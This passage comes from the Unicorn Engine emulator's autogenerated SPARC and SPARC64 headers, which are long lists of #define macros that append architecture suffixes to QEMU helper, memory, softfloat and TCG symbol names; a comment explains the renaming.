helper_fabsq helper_fabsq_sparc #define helper_fsqrts helper_fsqrts_sparc #define helper_fsqrtd helper_fsqrtd_sparc #define helper_fsqrtq helper_fsqrtq_sparc #define helper_fcmps helper_fcmps_sparc #define helper_fcmpd helper_fcmpd_sparc #define helper_fcmpes helper_fcmpes_sparc #define helper_fcmped helper_fcmped_sparc #define helper_fcmpq helper_fcmpq_sparc #define helper_fcmpeq helper_fcmpeq_sparc #define helper_fcmps_fcc1 helper_fcmps_fcc1_sparc #define helper_fcmpd_fcc1 helper_fcmpd_fcc1_sparc #define helper_fcmpq_fcc1 helper_fcmpq_fcc1_sparc #define helper_fcmps_fcc2 helper_fcmps_fcc2_sparc #define helper_fcmpd_fcc2 helper_fcmpd_fcc2_sparc #define helper_fcmpq_fcc2 helper_fcmpq_fcc2_sparc #define helper_fcmps_fcc3 helper_fcmps_fcc3_sparc #define helper_fcmpd_fcc3 helper_fcmpd_fcc3_sparc #define helper_fcmpq_fcc3 helper_fcmpq_fcc3_sparc #define helper_fcmpes_fcc1 helper_fcmpes_fcc1_sparc #define helper_fcmped_fcc1 helper_fcmped_fcc1_sparc #define helper_fcmpeq_fcc1 helper_fcmpeq_fcc1_sparc #define helper_fcmpes_fcc2 helper_fcmpes_fcc2_sparc #define helper_fcmped_fcc2 helper_fcmped_fcc2_sparc #define helper_fcmpeq_fcc2 helper_fcmpeq_fcc2_sparc #define helper_fcmpes_fcc3 helper_fcmpes_fcc3_sparc #define helper_fcmped_fcc3 helper_fcmped_fcc3_sparc #define helper_fcmpeq_fcc3 helper_fcmpeq_fcc3_sparc #define helper_ldfsr helper_ldfsr_sparc #define helper_ldxfsr helper_ldxfsr_sparc #define cpu_raise_exception_ra cpu_raise_exception_ra_sparc #define helper_raise_exception helper_raise_exception_sparc #define helper_debug helper_debug_sparc #define helper_tick_set_count helper_tick_set_count_sparc #define helper_tick_get_count helper_tick_get_count_sparc #define helper_tick_set_limit helper_tick_set_limit_sparc #define helper_udiv helper_udiv_sparc #define helper_udiv_cc helper_udiv_cc_sparc #define helper_sdiv helper_sdiv_sparc #define helper_sdiv_cc helper_sdiv_cc_sparc #define helper_sdivx helper_sdivx_sparc #define helper_udivx helper_udivx_sparc #define helper_taddcctv helper_taddcctv_sparc #define helper_tsubcctv helper_tsubcctv_sparc #define helper_power_down helper_power_down_sparc #define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc #define leon3_irq_manager leon3_irq_manager_sparc #define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc #define cpu_tsptr cpu_tsptr_sparc #define helper_set_softint helper_set_softint_sparc #define 
helper_clear_softint helper_clear_softint_sparc #define helper_write_softint helper_write_softint_sparc #define helper_check_align helper_check_align_sparc #define helper_ld_asi helper_ld_asi_sparc #define helper_st_asi helper_st_asi_sparc #define sparc_cpu_do_transaction_failed sparc_cpu_do_transaction_failed_sparc #define sparc_cpu_do_unaligned_access sparc_cpu_do_unaligned_access_sparc #define sparc_cpu_tlb_fill sparc_cpu_tlb_fill_sparc #define mmu_probe mmu_probe_sparc #define sparc_cpu_memory_rw_debug sparc_cpu_memory_rw_debug_sparc #define cpu_get_phys_page_nofault cpu_get_phys_page_nofault_sparc #define sparc_cpu_get_phys_page_debug sparc_cpu_get_phys_page_debug_sparc #define gen_intermediate_code gen_intermediate_code_sparc #define sparc_tcg_init sparc_tcg_init_sparc #define restore_state_to_opc restore_state_to_opc_sparc #define cpu_set_cwp cpu_set_cwp_sparc #define cpu_get_psr cpu_get_psr_sparc #define cpu_put_psr_raw cpu_put_psr_raw_sparc #define cpu_put_psr cpu_put_psr_sparc #define cpu_cwp_inc cpu_cwp_inc_sparc #define cpu_cwp_dec cpu_cwp_dec_sparc #define helper_rett helper_rett_sparc #define helper_save helper_save_sparc #define helper_restore helper_restore_sparc #define helper_flushw helper_flushw_sparc #define helper_saved helper_saved_sparc #define helper_restored helper_restored_sparc #define helper_wrpsr helper_wrpsr_sparc #define helper_rdpsr helper_rdpsr_sparc #define cpu_get_ccr cpu_get_ccr_sparc #define cpu_put_ccr cpu_put_ccr_sparc #define cpu_get_cwp64 cpu_get_cwp64_sparc #define cpu_put_cwp64 cpu_put_cwp64_sparc #define helper_rdccr helper_rdccr_sparc #define helper_wrccr helper_wrccr_sparc #define helper_rdcwp helper_rdcwp_sparc #define helper_wrcwp helper_wrcwp_sparc #define cpu_gl_switch_gregs cpu_gl_switch_gregs_sparc #define helper_wrgl helper_wrgl_sparc #define cpu_change_pstate cpu_change_pstate_sparc #define helper_wrpstate helper_wrpstate_sparc #define helper_wrpil helper_wrpil_sparc #define helper_done helper_done_sparc #define helper_retry helper_retry_sparc #endif
unicorn-2.1.1/qemu/sparc64.h
/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_sparc64_H #define UNICORN_AUTOGEN_sparc64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _sparc64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_sparc64 #define reg_read reg_read_sparc64 #define reg_write reg_write_sparc64 #define uc_init uc_init_sparc64 #define uc_add_inline_hook uc_add_inline_hook_sparc64 #define uc_del_inline_hook uc_del_inline_hook_sparc64 #define tb_invalidate_phys_range tb_invalidate_phys_range_sparc64 #define use_idiv_instructions use_idiv_instructions_sparc64 #define arm_arch arm_arch_sparc64 #define tb_target_set_jmp_target tb_target_set_jmp_target_sparc64 #define have_bmi1 have_bmi1_sparc64 #define have_popcnt have_popcnt_sparc64 #define have_avx1 have_avx1_sparc64 #define have_avx2 have_avx2_sparc64 #define have_isa have_isa_sparc64 #define have_altivec have_altivec_sparc64 #define have_vsx have_vsx_sparc64 #define flush_icache_range
flush_icache_range_sparc64 #define s390_facilities s390_facilities_sparc64 #define tcg_dump_op tcg_dump_op_sparc64 #define tcg_dump_ops tcg_dump_ops_sparc64 #define tcg_gen_and_i64 tcg_gen_and_i64_sparc64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_sparc64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_sparc64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_sparc64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_sparc64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_sparc64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_sparc64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_sparc64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_sparc64 #define tcg_gen_or_i64 tcg_gen_or_i64_sparc64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_sparc64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc64 #define tcg_gen_st_i64 tcg_gen_st_i64_sparc64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc64 #define cpu_icount_to_ns cpu_icount_to_ns_sparc64 #define cpu_is_stopped cpu_is_stopped_sparc64 #define cpu_get_ticks cpu_get_ticks_sparc64 #define cpu_get_clock cpu_get_clock_sparc64 #define cpu_resume cpu_resume_sparc64 #define qemu_init_vcpu qemu_init_vcpu_sparc64 #define cpu_stop_current cpu_stop_current_sparc64 #define resume_all_vcpus resume_all_vcpus_sparc64 #define vm_start vm_start_sparc64 #define address_space_dispatch_compact address_space_dispatch_compact_sparc64 #define flatview_translate flatview_translate_sparc64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_sparc64 #define qemu_get_cpu qemu_get_cpu_sparc64 #define cpu_address_space_init cpu_address_space_init_sparc64 #define cpu_get_address_space cpu_get_address_space_sparc64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_sparc64 #define cpu_exec_initfn cpu_exec_initfn_sparc64 #define cpu_exec_realizefn cpu_exec_realizefn_sparc64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_sparc64 #define cpu_watchpoint_insert cpu_watchpoint_insert_sparc64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_sparc64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_sparc64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_sparc64 #define cpu_breakpoint_insert cpu_breakpoint_insert_sparc64 #define cpu_breakpoint_remove cpu_breakpoint_remove_sparc64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_sparc64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_sparc64 #define cpu_abort cpu_abort_sparc64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_sparc64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_sparc64 #define flatview_add_to_dispatch flatview_add_to_dispatch_sparc64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_sparc64 #define qemu_ram_get_offset qemu_ram_get_offset_sparc64 #define qemu_ram_get_used_length qemu_ram_get_used_length_sparc64 #define qemu_ram_is_shared qemu_ram_is_shared_sparc64 #define qemu_ram_pagesize qemu_ram_pagesize_sparc64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_sparc64 #define qemu_ram_alloc qemu_ram_alloc_sparc64 #define qemu_ram_free qemu_ram_free_sparc64 #define qemu_map_ram_ptr qemu_map_ram_ptr_sparc64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_sparc64 #define qemu_ram_block_from_host qemu_ram_block_from_host_sparc64 #define qemu_ram_addr_from_host 
qemu_ram_addr_from_host_sparc64 #define cpu_check_watchpoint cpu_check_watchpoint_sparc64 #define iotlb_to_section iotlb_to_section_sparc64 #define address_space_dispatch_new address_space_dispatch_new_sparc64 #define address_space_dispatch_free address_space_dispatch_free_sparc64 #define flatview_read_continue flatview_read_continue_sparc64 #define address_space_read_full address_space_read_full_sparc64 #define address_space_write address_space_write_sparc64 #define address_space_rw address_space_rw_sparc64 #define cpu_physical_memory_rw cpu_physical_memory_rw_sparc64 #define address_space_write_rom address_space_write_rom_sparc64 #define cpu_flush_icache_range cpu_flush_icache_range_sparc64 #define cpu_exec_init_all cpu_exec_init_all_sparc64 #define address_space_access_valid address_space_access_valid_sparc64 #define address_space_map address_space_map_sparc64 #define address_space_unmap address_space_unmap_sparc64 #define cpu_physical_memory_map cpu_physical_memory_map_sparc64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_sparc64 #define cpu_memory_rw_debug cpu_memory_rw_debug_sparc64 #define qemu_target_page_size qemu_target_page_size_sparc64 #define qemu_target_page_bits qemu_target_page_bits_sparc64 #define qemu_target_page_bits_min qemu_target_page_bits_min_sparc64 #define target_words_bigendian target_words_bigendian_sparc64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_sparc64 #define ram_block_discard_range ram_block_discard_range_sparc64 #define ramblock_is_pmem ramblock_is_pmem_sparc64 #define page_size_init page_size_init_sparc64 #define set_preferred_target_page_bits set_preferred_target_page_bits_sparc64 #define finalize_target_page_bits finalize_target_page_bits_sparc64 #define cpu_outb cpu_outb_sparc64 #define cpu_outw cpu_outw_sparc64 #define cpu_outl cpu_outl_sparc64 #define cpu_inb cpu_inb_sparc64 #define cpu_inw cpu_inw_sparc64 #define cpu_inl cpu_inl_sparc64 #define memory_map memory_map_sparc64 #define memory_map_io memory_map_io_sparc64 #define memory_map_ptr memory_map_ptr_sparc64 #define memory_cow memory_cow_sparc64 #define memory_unmap memory_unmap_sparc64 #define memory_moveout memory_moveout_sparc64 #define memory_movein memory_movein_sparc64 #define memory_free memory_free_sparc64 #define flatview_unref flatview_unref_sparc64 #define address_space_get_flatview address_space_get_flatview_sparc64 #define memory_region_transaction_begin memory_region_transaction_begin_sparc64 #define memory_region_transaction_commit memory_region_transaction_commit_sparc64 #define memory_region_init memory_region_init_sparc64 #define memory_region_access_valid memory_region_access_valid_sparc64 #define memory_region_dispatch_read memory_region_dispatch_read_sparc64 #define memory_region_dispatch_write memory_region_dispatch_write_sparc64 #define memory_region_init_io memory_region_init_io_sparc64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_sparc64 #define memory_region_size memory_region_size_sparc64 #define memory_region_set_readonly memory_region_set_readonly_sparc64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_sparc64 #define memory_region_from_host memory_region_from_host_sparc64 #define memory_region_get_ram_addr memory_region_get_ram_addr_sparc64 #define memory_region_add_subregion memory_region_add_subregion_sparc64 #define memory_region_del_subregion memory_region_del_subregion_sparc64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_sparc64 #define memory_region_find 
memory_region_find_sparc64 #define memory_region_filter_subregions memory_region_filter_subregions_sparc64 #define memory_listener_register memory_listener_register_sparc64 #define memory_listener_unregister memory_listener_unregister_sparc64 #define address_space_remove_listeners address_space_remove_listeners_sparc64 #define address_space_init address_space_init_sparc64 #define address_space_destroy address_space_destroy_sparc64 #define memory_region_init_ram memory_region_init_ram_sparc64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_sparc64 #define find_memory_mapping find_memory_mapping_sparc64 #define exec_inline_op exec_inline_op_sparc64 #define floatx80_default_nan floatx80_default_nan_sparc64 #define float_raise float_raise_sparc64 #define float16_is_quiet_nan float16_is_quiet_nan_sparc64 #define float16_is_signaling_nan float16_is_signaling_nan_sparc64 #define float32_is_quiet_nan float32_is_quiet_nan_sparc64 #define float32_is_signaling_nan float32_is_signaling_nan_sparc64 #define float64_is_quiet_nan float64_is_quiet_nan_sparc64 #define float64_is_signaling_nan float64_is_signaling_nan_sparc64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_sparc64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_sparc64 #define floatx80_silence_nan floatx80_silence_nan_sparc64 #define propagateFloatx80NaN propagateFloatx80NaN_sparc64 #define float128_is_quiet_nan float128_is_quiet_nan_sparc64 #define float128_is_signaling_nan float128_is_signaling_nan_sparc64 #define float128_silence_nan float128_silence_nan_sparc64 #define float16_add float16_add_sparc64 #define float16_sub float16_sub_sparc64 #define float32_add float32_add_sparc64 #define float32_sub float32_sub_sparc64 #define float64_add float64_add_sparc64 #define float64_sub float64_sub_sparc64 #define float16_mul float16_mul_sparc64 #define float32_mul float32_mul_sparc64 #define float64_mul float64_mul_sparc64 #define float16_muladd float16_muladd_sparc64 #define float32_muladd float32_muladd_sparc64 #define float64_muladd float64_muladd_sparc64 #define float16_div float16_div_sparc64 #define float32_div float32_div_sparc64 #define float64_div float64_div_sparc64 #define float16_to_float32 float16_to_float32_sparc64 #define float16_to_float64 float16_to_float64_sparc64 #define float32_to_float16 float32_to_float16_sparc64 #define float32_to_float64 float32_to_float64_sparc64 #define float64_to_float16 float64_to_float16_sparc64 #define float64_to_float32 float64_to_float32_sparc64 #define float16_round_to_int float16_round_to_int_sparc64 #define float32_round_to_int float32_round_to_int_sparc64 #define float64_round_to_int float64_round_to_int_sparc64 #define float16_to_int16_scalbn float16_to_int16_scalbn_sparc64 #define float16_to_int32_scalbn float16_to_int32_scalbn_sparc64 #define float16_to_int64_scalbn float16_to_int64_scalbn_sparc64 #define float32_to_int16_scalbn float32_to_int16_scalbn_sparc64 #define float32_to_int32_scalbn float32_to_int32_scalbn_sparc64 #define float32_to_int64_scalbn float32_to_int64_scalbn_sparc64 #define float64_to_int16_scalbn float64_to_int16_scalbn_sparc64 #define float64_to_int32_scalbn float64_to_int32_scalbn_sparc64 #define float64_to_int64_scalbn float64_to_int64_scalbn_sparc64 #define float16_to_int16 float16_to_int16_sparc64 #define float16_to_int32 float16_to_int32_sparc64 #define float16_to_int64 float16_to_int64_sparc64 #define float32_to_int16 float32_to_int16_sparc64 #define float32_to_int32 float32_to_int32_sparc64 #define 
float32_to_int64 float32_to_int64_sparc64 #define float64_to_int16 float64_to_int16_sparc64 #define float64_to_int32 float64_to_int32_sparc64 #define float64_to_int64 float64_to_int64_sparc64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_sparc64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_sparc64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_sparc64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_sparc64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_sparc64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_sparc64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_sparc64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_sparc64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_sparc64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_sparc64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_sparc64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_sparc64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_sparc64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_sparc64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_sparc64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_sparc64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_sparc64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_sparc64 #define float16_to_uint16 float16_to_uint16_sparc64 #define float16_to_uint32 float16_to_uint32_sparc64 #define float16_to_uint64 float16_to_uint64_sparc64 #define float32_to_uint16 float32_to_uint16_sparc64 #define float32_to_uint32 float32_to_uint32_sparc64 #define float32_to_uint64 float32_to_uint64_sparc64 #define float64_to_uint16 float64_to_uint16_sparc64 #define float64_to_uint32 float64_to_uint32_sparc64 #define float64_to_uint64 float64_to_uint64_sparc64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_sparc64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_sparc64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_sparc64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_sparc64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_sparc64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_sparc64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_sparc64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_sparc64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_sparc64 #define int64_to_float16_scalbn int64_to_float16_scalbn_sparc64 #define int32_to_float16_scalbn int32_to_float16_scalbn_sparc64 #define int16_to_float16_scalbn int16_to_float16_scalbn_sparc64 #define int64_to_float16 int64_to_float16_sparc64 #define int32_to_float16 int32_to_float16_sparc64 #define int16_to_float16 int16_to_float16_sparc64 #define int64_to_float32_scalbn int64_to_float32_scalbn_sparc64 #define int32_to_float32_scalbn int32_to_float32_scalbn_sparc64 #define int16_to_float32_scalbn int16_to_float32_scalbn_sparc64 #define int64_to_float32 int64_to_float32_sparc64 #define int32_to_float32 int32_to_float32_sparc64 #define int16_to_float32 int16_to_float32_sparc64 #define int64_to_float64_scalbn int64_to_float64_scalbn_sparc64 #define int32_to_float64_scalbn int32_to_float64_scalbn_sparc64 #define int16_to_float64_scalbn int16_to_float64_scalbn_sparc64 
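/*
 * Sketch of how these mappings take effect (hypothetical symbol name,
 * not part of the generated list): every QEMU translation unit in this
 * target's build includes this header first, so the preprocessor
 * rewrites each global symbol before compilation and the per-target
 * objects export only suffixed names. Compiling the shared QEMU sources
 * once per architecture then links into a single libunicorn without
 * duplicate-symbol clashes:
 *
 *     #define helper_demo helper_demo_sparc64   // rename from this header
 *     void helper_demo(void);                   // shared QEMU declaration
 *     // ...the object file now defines/references helper_demo_sparc64,
 *     // while the sparc build of the same source yields helper_demo_sparc.
 */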
#define int64_to_float64 int64_to_float64_sparc64 #define int32_to_float64 int32_to_float64_sparc64 #define int16_to_float64 int16_to_float64_sparc64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_sparc64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_sparc64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_sparc64 #define uint64_to_float16 uint64_to_float16_sparc64 #define uint32_to_float16 uint32_to_float16_sparc64 #define uint16_to_float16 uint16_to_float16_sparc64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_sparc64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_sparc64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_sparc64 #define uint64_to_float32 uint64_to_float32_sparc64 #define uint32_to_float32 uint32_to_float32_sparc64 #define uint16_to_float32 uint16_to_float32_sparc64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_sparc64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_sparc64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_sparc64 #define uint64_to_float64 uint64_to_float64_sparc64 #define uint32_to_float64 uint32_to_float64_sparc64 #define uint16_to_float64 uint16_to_float64_sparc64 #define float16_min float16_min_sparc64 #define float16_minnum float16_minnum_sparc64 #define float16_minnummag float16_minnummag_sparc64 #define float16_max float16_max_sparc64 #define float16_maxnum float16_maxnum_sparc64 #define float16_maxnummag float16_maxnummag_sparc64 #define float32_min float32_min_sparc64 #define float32_minnum float32_minnum_sparc64 #define float32_minnummag float32_minnummag_sparc64 #define float32_max float32_max_sparc64 #define float32_maxnum float32_maxnum_sparc64 #define float32_maxnummag float32_maxnummag_sparc64 #define float64_min float64_min_sparc64 #define float64_minnum float64_minnum_sparc64 #define float64_minnummag float64_minnummag_sparc64 #define float64_max float64_max_sparc64 #define float64_maxnum float64_maxnum_sparc64 #define float64_maxnummag float64_maxnummag_sparc64 #define float16_compare float16_compare_sparc64 #define float16_compare_quiet float16_compare_quiet_sparc64 #define float32_compare float32_compare_sparc64 #define float32_compare_quiet float32_compare_quiet_sparc64 #define float64_compare float64_compare_sparc64 #define float64_compare_quiet float64_compare_quiet_sparc64 #define float16_scalbn float16_scalbn_sparc64 #define float32_scalbn float32_scalbn_sparc64 #define float64_scalbn float64_scalbn_sparc64 #define float16_sqrt float16_sqrt_sparc64 #define float32_sqrt float32_sqrt_sparc64 #define float64_sqrt float64_sqrt_sparc64 #define float16_default_nan float16_default_nan_sparc64 #define float32_default_nan float32_default_nan_sparc64 #define float64_default_nan float64_default_nan_sparc64 #define float128_default_nan float128_default_nan_sparc64 #define float16_silence_nan float16_silence_nan_sparc64 #define float32_silence_nan float32_silence_nan_sparc64 #define float64_silence_nan float64_silence_nan_sparc64 #define float16_squash_input_denormal float16_squash_input_denormal_sparc64 #define float32_squash_input_denormal float32_squash_input_denormal_sparc64 #define float64_squash_input_denormal float64_squash_input_denormal_sparc64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_sparc64 #define roundAndPackFloatx80 roundAndPackFloatx80_sparc64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_sparc64 #define int32_to_floatx80 int32_to_floatx80_sparc64 #define int32_to_float128 
int32_to_float128_sparc64 #define int64_to_floatx80 int64_to_floatx80_sparc64 #define int64_to_float128 int64_to_float128_sparc64 #define uint64_to_float128 uint64_to_float128_sparc64 #define float32_to_floatx80 float32_to_floatx80_sparc64 #define float32_to_float128 float32_to_float128_sparc64 #define float32_rem float32_rem_sparc64 #define float32_exp2 float32_exp2_sparc64 #define float32_log2 float32_log2_sparc64 #define float32_eq float32_eq_sparc64 #define float32_le float32_le_sparc64 #define float32_lt float32_lt_sparc64 #define float32_unordered float32_unordered_sparc64 #define float32_eq_quiet float32_eq_quiet_sparc64 #define float32_le_quiet float32_le_quiet_sparc64 #define float32_lt_quiet float32_lt_quiet_sparc64 #define float32_unordered_quiet float32_unordered_quiet_sparc64 #define float64_to_floatx80 float64_to_floatx80_sparc64 #define float64_to_float128 float64_to_float128_sparc64 #define float64_rem float64_rem_sparc64 #define float64_log2 float64_log2_sparc64 #define float64_eq float64_eq_sparc64 #define float64_le float64_le_sparc64 #define float64_lt float64_lt_sparc64 #define float64_unordered float64_unordered_sparc64 #define float64_eq_quiet float64_eq_quiet_sparc64 #define float64_le_quiet float64_le_quiet_sparc64 #define float64_lt_quiet float64_lt_quiet_sparc64 #define float64_unordered_quiet float64_unordered_quiet_sparc64 #define floatx80_to_int32 floatx80_to_int32_sparc64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_sparc64 #define floatx80_to_int64 floatx80_to_int64_sparc64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_sparc64 #define floatx80_to_float32 floatx80_to_float32_sparc64 #define floatx80_to_float64 floatx80_to_float64_sparc64 #define floatx80_to_float128 floatx80_to_float128_sparc64 #define floatx80_round floatx80_round_sparc64 #define floatx80_round_to_int floatx80_round_to_int_sparc64 #define floatx80_add floatx80_add_sparc64 #define floatx80_sub floatx80_sub_sparc64 #define floatx80_mul floatx80_mul_sparc64 #define floatx80_div floatx80_div_sparc64 #define floatx80_rem floatx80_rem_sparc64 #define floatx80_sqrt floatx80_sqrt_sparc64 #define floatx80_eq floatx80_eq_sparc64 #define floatx80_le floatx80_le_sparc64 #define floatx80_lt floatx80_lt_sparc64 #define floatx80_unordered floatx80_unordered_sparc64 #define floatx80_eq_quiet floatx80_eq_quiet_sparc64 #define floatx80_le_quiet floatx80_le_quiet_sparc64 #define floatx80_lt_quiet floatx80_lt_quiet_sparc64 #define floatx80_unordered_quiet floatx80_unordered_quiet_sparc64 #define float128_to_int32 float128_to_int32_sparc64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_sparc64 #define float128_to_int64 float128_to_int64_sparc64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_sparc64 #define float128_to_uint64 float128_to_uint64_sparc64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_sparc64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_sparc64 #define float128_to_uint32 float128_to_uint32_sparc64 #define float128_to_float32 float128_to_float32_sparc64 #define float128_to_float64 float128_to_float64_sparc64 #define float128_to_floatx80 float128_to_floatx80_sparc64 #define float128_round_to_int float128_round_to_int_sparc64 #define float128_add float128_add_sparc64 #define float128_sub float128_sub_sparc64 #define float128_mul float128_mul_sparc64 #define float128_div float128_div_sparc64 #define float128_rem float128_rem_sparc64 #define 
float128_sqrt float128_sqrt_sparc64 #define float128_eq float128_eq_sparc64 #define float128_le float128_le_sparc64 #define float128_lt float128_lt_sparc64 #define float128_unordered float128_unordered_sparc64 #define float128_eq_quiet float128_eq_quiet_sparc64 #define float128_le_quiet float128_le_quiet_sparc64 #define float128_lt_quiet float128_lt_quiet_sparc64 #define float128_unordered_quiet float128_unordered_quiet_sparc64 #define floatx80_compare floatx80_compare_sparc64 #define floatx80_compare_quiet floatx80_compare_quiet_sparc64 #define float128_compare float128_compare_sparc64 #define float128_compare_quiet float128_compare_quiet_sparc64 #define floatx80_scalbn floatx80_scalbn_sparc64 #define float128_scalbn float128_scalbn_sparc64 #define softfloat_init softfloat_init_sparc64 #define tcg_optimize tcg_optimize_sparc64 #define gen_new_label gen_new_label_sparc64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_sparc64 #define tcg_expand_vec_op tcg_expand_vec_op_sparc64 #define tcg_register_jit tcg_register_jit_sparc64 #define tcg_tb_insert tcg_tb_insert_sparc64 #define tcg_tb_remove tcg_tb_remove_sparc64 #define tcg_tb_lookup tcg_tb_lookup_sparc64 #define tcg_tb_foreach tcg_tb_foreach_sparc64 #define tcg_nb_tbs tcg_nb_tbs_sparc64 #define tcg_region_reset_all tcg_region_reset_all_sparc64 #define tcg_region_init tcg_region_init_sparc64 #define tcg_code_size tcg_code_size_sparc64 #define tcg_code_capacity tcg_code_capacity_sparc64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_sparc64 #define tcg_malloc_internal tcg_malloc_internal_sparc64 #define tcg_pool_reset tcg_pool_reset_sparc64 #define tcg_context_init tcg_context_init_sparc64 #define tcg_tb_alloc tcg_tb_alloc_sparc64 #define tcg_prologue_init tcg_prologue_init_sparc64 #define tcg_func_start tcg_func_start_sparc64 #define tcg_set_frame tcg_set_frame_sparc64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_sparc64 #define tcg_temp_new_internal tcg_temp_new_internal_sparc64 #define tcg_temp_new_vec tcg_temp_new_vec_sparc64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_sparc64 #define tcg_temp_free_internal tcg_temp_free_internal_sparc64 #define tcg_const_i32 tcg_const_i32_sparc64 #define tcg_const_i64 tcg_const_i64_sparc64 #define tcg_const_local_i32 tcg_const_local_i32_sparc64 #define tcg_const_local_i64 tcg_const_local_i64_sparc64 #define tcg_op_supported tcg_op_supported_sparc64 #define tcg_gen_callN tcg_gen_callN_sparc64 #define tcg_op_remove tcg_op_remove_sparc64 #define tcg_emit_op tcg_emit_op_sparc64 #define tcg_op_insert_before tcg_op_insert_before_sparc64 #define tcg_op_insert_after tcg_op_insert_after_sparc64 #define tcg_cpu_exec_time tcg_cpu_exec_time_sparc64 #define tcg_gen_code tcg_gen_code_sparc64 #define tcg_gen_op1 tcg_gen_op1_sparc64 #define tcg_gen_op2 tcg_gen_op2_sparc64 #define tcg_gen_op3 tcg_gen_op3_sparc64 #define tcg_gen_op4 tcg_gen_op4_sparc64 #define tcg_gen_op5 tcg_gen_op5_sparc64 #define tcg_gen_op6 tcg_gen_op6_sparc64 #define tcg_gen_mb tcg_gen_mb_sparc64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_sparc64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_sparc64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_sparc64 #define tcg_gen_andi_i32 